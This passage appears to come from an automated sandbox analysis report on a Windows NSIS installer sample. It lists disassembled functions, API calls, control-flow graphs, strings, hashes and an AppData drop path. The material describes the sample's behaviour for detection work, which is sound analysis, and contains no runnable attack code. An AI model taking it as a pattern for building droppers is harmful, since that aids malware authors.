                                                              • LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,C:\Users\user\AppData\Roaming\pechay\transskribere\jon), ref: 00403AF8
                                                                • Part of subcall function 004061C9: wsprintfW.USER32 ref: 004061D6
                                                              • RegisterClassW.USER32(00433E80), ref: 00403B35
                                                              • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00403B4D
                                                              • CreateWindowExW.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403B82
                                                              • ShowWindow.USER32(00000005,00000000), ref: 00403BB8
                                                              • GetClassInfoW.USER32(00000000,RichEdit20W,00433E80), ref: 00403BE4
                                                              • GetClassInfoW.USER32(00000000,RichEdit,00433E80), ref: 00403BF1
                                                              • RegisterClassW.USER32(00433E80), ref: 00403BFA
                                                              • DialogBoxParamW.USER32(?,00000000,00403D3E,00000000), ref: 00403C19
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2850643846.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.2850619179.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2850674481.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2850693548.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2850693548.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2850693548.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2850693548.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2850693548.0000000000468000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2850822528.000000000046A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_450707124374000811.jbxd
                                                              Similarity
                                                              • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                                                              • String ID: "C:\Users\user\Desktop\450707124374000811.exe"$.DEFAULT\Control Panel\International$.exe$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Roaming\pechay\transskribere\jon$Call$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb
                                                              • API String ID: 1975747703-2369375780
                                                              • Opcode ID: d13a808758802c6e3fc48dc76d19d1d1e2605ae81d2ad2d57bfa7261d619400b
                                                              • Instruction ID: b69a5953a59a380dedfc974e339360e26c19c43312473aa69c5b527d033ca56b
                                                              • Opcode Fuzzy Hash: d13a808758802c6e3fc48dc76d19d1d1e2605ae81d2ad2d57bfa7261d619400b
                                                              • Instruction Fuzzy Hash: 7061A8312003006ED320BF669D46F673A6CEB84B5AF40053FF945B62E2DB7DA9418A2D
                                                              Function 00402EC1 Relevance: 24.7, APIs: 5, Strings: 9, Instructions: 182COMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 440 402ec1-402f0f GetTickCount GetModuleFileNameW call 405d74 443 402f11-402f16 440->443 444 402f1b-402f49 call 406282 call 405b9f call 406282 GetFileSize 440->444 445 4030f3-4030f7 443->445 452 403036-403044 call 402e5d 444->452 453 402f4f 444->453 459 403046-403049 452->459 460 403099-40309e 452->460 455 402f54-402f6b 453->455 457 402f6d 455->457 458 402f6f-402f78 call 403315 455->458 457->458 467 4030a0-4030a8 call 402e5d 458->467 468 402f7e-402f85 458->468 462 40304b-403063 call 40332b call 403315 459->462 463 40306d-403097 GlobalAlloc call 40332b call 4030fa 459->463 460->445 462->460 491 403065-40306b 462->491 463->460 489 4030aa-4030bb 463->489 467->460 469 403001-403005 468->469 470 402f87-402f9b call 405d2f 468->470 477 403007-40300e call 402e5d 469->477 478 40300f-403015 469->478 470->478 487 402f9d-402fa4 470->487 477->478 480 403024-40302e 478->480 481 403017-403021 call 40674f 478->481 480->455 488 403034 480->488 481->480 487->478 493 402fa6-402fad 487->493 488->452 494 4030c3-4030c8 489->494 495 4030bd 489->495 491->460 491->463 493->478 496 402faf-402fb6 493->496 497 4030c9-4030cf 494->497 495->494 496->478 498 402fb8-402fbf 496->498 497->497 499 4030d1-4030ec SetFilePointer call 405d2f 497->499 498->478 500 402fc1-402fe1 498->500 503 4030f1 499->503 500->460 502 402fe7-402feb 500->502 504 402ff3-402ffb 502->504 505 402fed-402ff1 502->505 503->445 504->478 506 402ffd-402fff 504->506 505->488 505->504 506->478
                                                              APIs
                                                              • GetTickCount.KERNEL32 ref: 00402ED2
                                                              • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\450707124374000811.exe,00000400,?,00000006,00000008,0000000A), ref: 00402EEE
                                                                • Part of subcall function 00405D74: GetFileAttributesW.KERNELBASE(?,00402F01,C:\Users\user\Desktop\450707124374000811.exe,80000000,00000003,?,00000006,00000008,0000000A), ref: 00405D78
                                                                • Part of subcall function 00405D74: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,00000006,00000008,0000000A), ref: 00405D9A
                                                              • GetFileSize.KERNEL32(00000000,00000000,00443000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\450707124374000811.exe,C:\Users\user\Desktop\450707124374000811.exe,80000000,00000003,?,00000006,00000008,0000000A), ref: 00402F3A
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2850643846.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.2850619179.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2850674481.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2850693548.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2850693548.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2850693548.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2850693548.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2850693548.0000000000468000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2850822528.000000000046A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_450707124374000811.jbxd
                                                              Similarity
                                                              • API ID: File$AttributesCountCreateModuleNameSizeTick
                                                              • String ID: "C:\Users\user\Desktop\450707124374000811.exe"$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\450707124374000811.exe$Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
                                                              • API String ID: 4283519449-2548887016
                                                              • Opcode ID: 63e69acdaec1fdaba5d4a89e2a3b5318abe59b2b0843af0c7679ee6c60d0c948
                                                              • Instruction ID: 5fb561c1f1da7fe65fe29aa304fda9dad36d264b5387f138e6185790fd874317
                                                              • Opcode Fuzzy Hash: 63e69acdaec1fdaba5d4a89e2a3b5318abe59b2b0843af0c7679ee6c60d0c948
                                                              • Instruction Fuzzy Hash: 18510471902216AFDB20AF64DD85B9E7EB8FB00359F15403BF904B62C5C7789E408B6C
                                                              Function 004062A4 Relevance: 17.7, APIs: 7, Strings: 3, Instructions: 209stringCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 507 4062a4-4062af 508 4062b1-4062c0 507->508 509 4062c2-4062d8 507->509 508->509 510 4064f0-4064f6 509->510 511 4062de-4062eb 509->511 512 4064fc-406507 510->512 513 4062fd-40630a 510->513 511->510 514 4062f1-4062f8 511->514 515 406512-406513 512->515 516 406509-40650d call 406282 512->516 513->512 517 406310-40631c 513->517 514->510 516->515 519 406322-406360 517->519 520 4064dd 517->520 523 406480-406484 519->523 524 406366-406371 519->524 521 4064eb-4064ee 520->521 522 4064df-4064e9 520->522 521->510 522->510 527 406486-40648c 523->527 528 4064b7-4064bb 523->528 525 406373-406378 524->525 526 40638a 524->526 525->526 529 40637a-40637d 525->529 532 406391-406398 526->532 530 40649c-4064a8 call 406282 527->530 531 40648e-40649a call 4061c9 527->531 533 4064ca-4064db lstrlenW 528->533 534 4064bd-4064c5 call 4062a4 528->534 529->526 535 40637f-406382 529->535 545 4064ad-4064b3 530->545 531->545 537 40639a-40639c 532->537 538 40639d-40639f 532->538 533->510 534->533 535->526 541 406384-406388 535->541 537->538 543 4063a1-4063bf call 406150 538->543 544 4063da-4063dd 538->544 541->532 553 4063c4-4063c8 543->553 548 4063ed-4063f0 544->548 549 4063df-4063eb GetSystemDirectoryW 544->549 545->533 547 4064b5 545->547 554 406478-40647e call 406516 547->554 551 4063f2-406400 GetWindowsDirectoryW 548->551 552 40645b-40645d 548->552 550 40645f-406463 549->550 550->554 559 406465 550->559 551->552 552->550 556 406402-40640c 552->556 557 406468-40646b 553->557 558 4063ce-4063d5 call 4062a4 553->558 554->533 561 406426-40643c SHGetSpecialFolderLocation 556->561 562 40640e-406411 556->562 557->554 564 40646d-406473 lstrcatW 557->564 558->550 559->557 566 406457 561->566 567 40643e-406455 SHGetPathFromIDListW CoTaskMemFree 561->567 562->561 565 406413-40641a 562->565 564->554 569 406422-406424 565->569 566->552 567->550 567->566 569->550 569->561
                                                              APIs
                                                              • GetSystemDirectoryW.KERNEL32(Call,00000400), ref: 004063E5
                                                              • GetWindowsDirectoryW.KERNEL32(Call,00000400,00000000,0042C228,?,0040531D,0042C228,00000000), ref: 004063F8
                                                              • SHGetSpecialFolderLocation.SHELL32(0040531D,0041D800,00000000,0042C228,?,0040531D,0042C228,00000000), ref: 00406434
                                                              • SHGetPathFromIDListW.SHELL32(0041D800,Call), ref: 00406442
                                                              • CoTaskMemFree.OLE32(0041D800), ref: 0040644D
                                                              • lstrcatW.KERNEL32(Call,\Microsoft\Internet Explorer\Quick Launch), ref: 00406473
                                                              • lstrlenW.KERNEL32(Call,00000000,0042C228,?,0040531D,0042C228,00000000), ref: 004064CB
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2850643846.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.2850619179.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2850674481.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2850693548.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2850693548.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2850693548.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2850693548.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2850693548.0000000000468000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2850822528.000000000046A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_450707124374000811.jbxd
                                                              Similarity
                                                              • API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskWindowslstrcatlstrlen
                                                              • String ID: Call$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                                              • API String ID: 717251189-1230650788
                                                              • Opcode ID: 5757adc76ebd299de9e3f21c9246a654aa3bace2b5e710508428971d5ba8c1fc
                                                              • Instruction ID: 2bc9f3e321a063d065e255e84c3e845f89f4622f689527909a28eedc1d3cb15f
                                                              • Opcode Fuzzy Hash: 5757adc76ebd299de9e3f21c9246a654aa3bace2b5e710508428971d5ba8c1fc
                                                              • Instruction Fuzzy Hash: 1D613631A00205ABDF209F64CD41ABE37A5AF44318F16813FE947B62D1D77C5AA1CB9D
                                                              Function 0040176F Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 145stringtimeCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 634 40176f-401794 call 402c37 call 405bca 639 401796-40179c call 406282 634->639 640 40179e-4017b0 call 406282 call 405b53 lstrcatW 634->640 645 4017b5-4017b6 call 406516 639->645 640->645 649 4017bb-4017bf 645->649 650 4017c1-4017cb call 4065c5 649->650 651 4017f2-4017f5 649->651 658 4017dd-4017ef 650->658 659 4017cd-4017db CompareFileTime 650->659 653 4017f7-4017f8 call 405d4f 651->653 654 4017fd-401819 call 405d74 651->654 653->654 661 40181b-40181e 654->661 662 40188d-4018b6 call 4052e6 call 4030fa 654->662 658->651 659->658 664 401820-40185e call 406282 * 2 call 4062a4 call 406282 call 4058e4 661->664 665 40186f-401879 call 4052e6 661->665 676 4018b8-4018bc 662->676 677 4018be-4018ca SetFileTime 662->677 664->649 697 401864-401865 664->697 674 401882-401888 665->674 678 402ac8 674->678 676->677 680 4018d0-4018db CloseHandle 676->680 677->680 684 402aca-402ace 678->684 682 4018e1-4018e4 680->682 683 402abf-402ac2 680->683 686 4018e6-4018f7 call 4062a4 lstrcatW 682->686 687 4018f9-4018fc call 4062a4 682->687 683->678 693 401901-4022f6 call 4058e4 686->693 687->693 693->684 697->674 699 401867-401868 697->699 699->665
                                                              APIs
                                                              • lstrcatW.KERNEL32(00000000,00000000,Call,C:\Users\user\AppData\Roaming\pechay\transskribere\jon,?,?,00000031), ref: 004017B0
                                                              • CompareFileTime.KERNEL32(-00000014,?,Call,Call,00000000,00000000,Call,C:\Users\user\AppData\Roaming\pechay\transskribere\jon,?,?,00000031), ref: 004017D5
                                                                • Part of subcall function 00406282: lstrcpynW.KERNEL32(?,?,00000400,00403444,00433EE0,NSIS Error,?,00000006,00000008,0000000A), ref: 0040628F
                                                                • Part of subcall function 004052E6: lstrlenW.KERNEL32(0042C228,00000000,0041D800,759223A0,?,?,?,?,?,?,?,?,?,0040325E,00000000,?), ref: 0040531E
                                                                • Part of subcall function 004052E6: lstrlenW.KERNEL32(0040325E,0042C228,00000000,0041D800,759223A0,?,?,?,?,?,?,?,?,?,0040325E,00000000), ref: 0040532E
                                                                • Part of subcall function 004052E6: lstrcatW.KERNEL32(0042C228,0040325E,0040325E,0042C228,00000000,0041D800,759223A0), ref: 00405341
                                                                • Part of subcall function 004052E6: SetWindowTextW.USER32(0042C228,0042C228), ref: 00405353
                                                                • Part of subcall function 004052E6: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405379
                                                                • Part of subcall function 004052E6: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405393
                                                                • Part of subcall function 004052E6: SendMessageW.USER32(?,00001013,?,00000000), ref: 004053A1
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2850643846.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.2850619179.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2850674481.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2850693548.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2850693548.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2850693548.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2850693548.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2850693548.0000000000468000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2850822528.000000000046A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_450707124374000811.jbxd
                                                              Similarity
                                                              • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                                              • String ID: C:\Users\user\AppData\Local\Temp\nsj4634.tmp$C:\Users\user\AppData\Local\Temp\nsj4634.tmp\System.dll$C:\Users\user\AppData\Roaming\pechay\transskribere\jon$Call
                                                              • API String ID: 1941528284-3000692972
                                                              • Opcode ID: 5b350da25249687dd4719405322e9856b363981bc1dd38a50fc9a6532880dae0
                                                              • Instruction ID: 71989b97474780e21d9e3883d12846d469cfbdfaa42366440e3466e884ca0043
                                                              • Opcode Fuzzy Hash: 5b350da25249687dd4719405322e9856b363981bc1dd38a50fc9a6532880dae0
                                                              • Instruction Fuzzy Hash: C1419431900518BECF11BBA5DC46DAF3679EF45328F20423FF412B50E1DA3C8A519A6D
                                                              Function 004030FA Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 166COMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 700 4030fa-403111 701 403113 700->701 702 40311a-403123 700->702 701->702 703 403125 702->703 704 40312c-403131 702->704 703->704 705 403141-40314e call 403315 704->705 706 403133-40313c call 40332b 704->706 710 403303 705->710 711 403154-403158 705->711 706->705 712 403305-403306 710->712 713 4032ae-4032b0 711->713 714 40315e-4031a7 GetTickCount 711->714 717 40330e-403312 712->717 715 4032f0-4032f3 713->715 716 4032b2-4032b5 713->716 718 40330b 714->718 719 4031ad-4031b5 714->719 723 4032f5 715->723 724 4032f8-403301 call 403315 715->724 716->718 720 4032b7 716->720 718->717 721 4031b7 719->721 722 4031ba-4031c8 call 403315 719->722 726 4032ba-4032c0 720->726 721->722 722->710 734 4031ce-4031d7 722->734 723->724 724->710 732 403308 724->732 729 4032c2 726->729 730 4032c4-4032d2 call 403315 726->730 729->730 730->710 737 4032d4-4032e0 call 405e26 730->737 732->718 736 4031dd-4031fd call 4067bd 734->736 742 403203-403216 GetTickCount 736->742 743 4032a6-4032a8 736->743 744 4032e2-4032ec 737->744 745 4032aa-4032ac 737->745 746 403261-403263 742->746 747 403218-403220 742->747 743->712 744->726 750 4032ee 744->750 745->712 748 403265-403269 746->748 749 40329a-40329e 746->749 751 403222-403226 747->751 752 403228-40325e MulDiv wsprintfW call 4052e6 747->752 754 403280-40328b 748->754 755 40326b-403272 call 405e26 748->755 749->719 756 4032a4 749->756 750->718 751->746 751->752 752->746 759 40328e-403292 754->759 760 403277-403279 755->760 756->718 759->736 761 403298 759->761 760->745 762 40327b-40327e 760->762 761->718 762->759
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2850643846.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.2850619179.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2850674481.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2850693548.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2850693548.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2850693548.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2850693548.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2850693548.0000000000468000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2850822528.000000000046A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_450707124374000811.jbxd
                                                              Similarity
                                                              • API ID: CountTick$wsprintf
                                                              • String ID: ... %d%%$@
                                                              • API String ID: 551687249-3859443358
                                                              • Opcode ID: bcadc4b8fcc5a9726af7f1001a2bc5a9f2fe7a461361550fb019878be66ece88
                                                              • Instruction ID: f75c430432033e5046526aed0a4a2f939c591a2e87bafbbe4e5c1659d7ec9983
                                                              • Opcode Fuzzy Hash: bcadc4b8fcc5a9726af7f1001a2bc5a9f2fe7a461361550fb019878be66ece88
                                                              • Instruction Fuzzy Hash: 85515A71900219EBDB10CF69DA84B9E7FA8AF45366F14417BEC14B72C0C778DA50CBA9
                                                              Function 00402644 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 153fileCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 763 402644-40265d call 402c15 766 402663-40266a 763->766 767 402abf-402ac2 763->767 768 40266c 766->768 769 40266f-402672 766->769 770 402ac8-402ace 767->770 768->769 771 4027d6-4027de 769->771 772 402678-402687 call 4061e2 769->772 771->767 772->771 776 40268d 772->776 777 402693-402697 776->777 778 40272c-40272f 777->778 779 40269d-4026b8 ReadFile 777->779 780 402731-402734 778->780 781 402747-402757 call 405df7 778->781 779->771 782 4026be-4026c3 779->782 780->781 783 402736-402741 call 405e55 780->783 781->771 791 402759 781->791 782->771 785 4026c9-4026d7 782->785 783->771 783->781 788 402792-40279e call 4061c9 785->788 789 4026dd-4026ef MultiByteToWideChar 785->789 788->770 789->791 792 4026f1-4026f4 789->792 795 40275c-40275f 791->795 796 4026f6-402701 792->796 795->788 797 402761-402766 795->797 796->795 798 402703-402728 SetFilePointer MultiByteToWideChar 796->798 799 4027a3-4027a7 797->799 800 402768-40276d 797->800 798->796 801 40272a 798->801 802 4027c4-4027d0 SetFilePointer 799->802 803 4027a9-4027ad 799->803 800->799 804 40276f-402782 800->804 801->791 802->771 805 4027b5-4027c2 803->805 806 4027af-4027b3 803->806 804->771 807 402784-40278a 804->807 805->771 806->802 806->805 807->777 808 402790 807->808 808->771
                                                              APIs
                                                              • ReadFile.KERNELBASE(?,?,?,?), ref: 004026B0
                                                              • MultiByteToWideChar.KERNEL32(?,00000008,?,?,?,00000001), ref: 004026EB
                                                              • SetFilePointer.KERNELBASE(?,?,?,00000001,?,00000008,?,?,?,00000001), ref: 0040270E
                                                              • MultiByteToWideChar.KERNEL32(?,00000008,?,00000000,?,00000001,?,00000001,?,00000008,?,?,?,00000001), ref: 00402724
                                                                • Part of subcall function 00405E55: SetFilePointer.KERNEL32(?,00000000,00000000,00000001), ref: 00405E6B
                                                              • SetFilePointer.KERNEL32(?,?,?,00000001,?,?,00000002), ref: 004027D0
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2850643846.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.2850619179.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2850674481.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2850693548.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2850693548.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2850693548.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2850693548.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2850693548.0000000000468000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2850822528.000000000046A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_450707124374000811.jbxd
                                                              Similarity
                                                              • API ID: File$Pointer$ByteCharMultiWide$Read
                                                              • String ID: 9
                                                              • API String ID: 163830602-2366072709
                                                              • Opcode ID: 0f6749e0356039c80119e9da3c7509a60750b74a106ccf27ce207c31930fcb0b
                                                              • Instruction ID: 4c47c5b6e7001fd487639b42c981b506dedcea616f9f6d447a3608767ea6fa5a
                                                              • Opcode Fuzzy Hash: 0f6749e0356039c80119e9da3c7509a60750b74a106ccf27ce207c31930fcb0b
                                                              • Instruction Fuzzy Hash: 8351E575D1021AABDF20DFA5DA88AAEB779FF04304F50443BE511B72D0D7B899828B58
                                                              Function 004065EC Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 36libraryCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 809 4065ec-40660c GetSystemDirectoryW 810 406610-406612 809->810 811 40660e 809->811 812 406623-406625 810->812 813 406614-40661d 810->813 811->810 815 406626-406659 wsprintfW LoadLibraryExW 812->815 813->812 814 40661f-406621 813->814 814->815
                                                              APIs
                                                              • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 00406603
                                                              • wsprintfW.USER32 ref: 0040663E
                                                              • LoadLibraryExW.KERNEL32(?,00000000,00000008), ref: 00406652
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2850643846.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.2850619179.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2850674481.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2850693548.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2850693548.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2850693548.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2850693548.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2850693548.0000000000468000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2850822528.000000000046A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_450707124374000811.jbxd
                                                              Similarity
                                                              • API ID: DirectoryLibraryLoadSystemwsprintf
                                                              • String ID: %s%S.dll$UXTHEME$\
                                                              • API String ID: 2200240437-1946221925
                                                              • Opcode ID: fcd04411c5a1f64f7e9219edfc5ac0d332aa1f587fd7b062781a7321f30925af
                                                              • Instruction ID: 71749ee66451d02820e1787a81c679d49f65c12e6a5790e59d0bd58148e6f3af
                                                              • Opcode Fuzzy Hash: fcd04411c5a1f64f7e9219edfc5ac0d332aa1f587fd7b062781a7321f30925af
                                                              • Instruction Fuzzy Hash: 64F021705001196BCF10AB64DD0DFAB3B5CA700304F10487AA546F11D1EBBDDA65CB98
                                                              Function 004057B5 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 39COMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 816 4057b5-405800 CreateDirectoryW 817 405802-405804 816->817 818 405806-405813 GetLastError 816->818 819 40582d-40582f 817->819 818->819 820 405815-405829 SetFileSecurityW 818->820 820->817 821 40582b GetLastError 820->821 821->819
                                                              APIs
                                                              • CreateDirectoryW.KERNELBASE(?,?,00000000), ref: 004057F8
                                                              • GetLastError.KERNEL32 ref: 0040580C
                                                              • SetFileSecurityW.ADVAPI32(?,80000007,00000001), ref: 00405821
                                                              • GetLastError.KERNEL32 ref: 0040582B
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2850643846.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.2850619179.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2850674481.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2850693548.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2850693548.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2850693548.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2850693548.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2850693548.0000000000468000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2850822528.000000000046A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_450707124374000811.jbxd
                                                              Similarity
                                                              • API ID: ErrorLast$CreateDirectoryFileSecurity
                                                              • String ID: C:\Users\user\Desktop
                                                              • API String ID: 3449924974-1246513382
                                                              • Opcode ID: c7775b55854fc79259119bfc4daa9494171cd7cf58f96f816c013ac7f64a11dc
                                                              • Instruction ID: 81d47e77b106c5c69b6f53bab6ade4ced08fad65239eb4e1eedbceb886e7a33c
                                                              • Opcode Fuzzy Hash: c7775b55854fc79259119bfc4daa9494171cd7cf58f96f816c013ac7f64a11dc
                                                              • Instruction Fuzzy Hash: 8C01E5B2C00619DADF009FA1D9487EFBFB8EB14354F00803AD945B6281E7789618CFA9
                                                              Function 00405DA3 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 37COMMON
